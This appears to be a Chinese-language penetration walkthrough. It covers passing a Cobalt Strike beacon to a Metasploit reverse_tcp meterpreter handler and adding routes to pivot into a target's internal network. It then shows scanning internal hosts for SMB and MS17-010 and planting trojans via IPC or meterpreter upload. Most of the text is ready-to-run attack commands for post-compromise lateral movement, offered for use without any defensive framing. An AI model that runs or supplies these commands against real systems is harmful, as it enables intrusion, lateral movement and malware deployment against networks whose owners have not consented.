第一步
Cobalt strike 派生 shell 給 MSF(前提有個beacon shell)

第二步
選擇要派生的beacon,右鍵-->增加會話,選擇剛剛配置的foreign監聽器
第三部 msf
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp

第四步添加路由
如果在meterpreter中
run get_local_subnets 查看目標內網路由
run autoroute -s 100.0.0.0/8 #(根據目標內網網絡而定) 添加路由
run autoroute –p 一般來說,在meterpreter中設置路由便可以達到通往其內網的目的。然而有些時候還是會失敗,這時我們可以background返回msf>,查看下外面的路由情況。

如果沒有路由規則 那么可以在msf中
msf>route add 10.0.0.0 255.0.0.0 1
說明:1表示session 1,攻擊機如果要去訪問10.0.0.0/8網段的資源,其下一跳是session1,至於什么是下一條這里不多說了,反正就是目前攻擊機可以訪問內網資源了。
然后
連接postgresql數據庫,不連接的話掃描的信息的信息無法入庫。連接上后可通過db_status查看狀態。
Kali linux:
首先啟動數據庫:service postgresql start
啟動msfsploit服務:service metasploit start
啟動msfconsole:msfconsole
使用db_status確認數據庫是否正確連接

如果默認沒有鏈接的話可以先自己裝一個postgresql數據庫,然后新建一個名為msf的庫,在msf中執行命令連接:db_connect postgres:123456@127.0.0.1:5433/msf

第三步:運行smb模塊探測主機445端口開放情況。
use auxiliary/scanner/smb/smb_version set rhosts 192.168.236.129/24 set threads 16 run

掃描完成后,掃描的信息會自動存入數據庫,可通過hosts命令查看

第四步:使用smb_ms17_010模塊探測MS17-010漏洞
use auxiliary/scanner/smb/smb_ms17_010 show options set threads 16 services -r tcp -p 445 -R run


然后就是一系列的上馬這些操作了 可以ipc也可以msf的upload

文獻參考
https://www.cnblogs.com/backlion/p/9484949.html msf命令操作
https://www.4hou.com/tools/4765.html
https://bbs.ichunqiu.com/thread-53044-1-1.html cs
